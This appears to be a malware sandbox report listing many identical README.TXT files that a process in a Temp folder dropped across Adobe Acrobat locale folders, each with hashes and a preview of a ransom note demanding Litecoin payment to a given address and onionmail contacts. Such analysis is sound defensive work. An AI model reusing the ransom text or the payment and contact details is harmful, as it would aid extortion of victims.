                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\hu-hu\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\it-it\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ja-jp\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ko-kr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\nb-no\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\nl-nl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pl-pl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pt-br\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ro-ro\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\root\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ru-ru\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sk-sk\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sl-si\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sl-sl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sv-se\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\tr-tr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
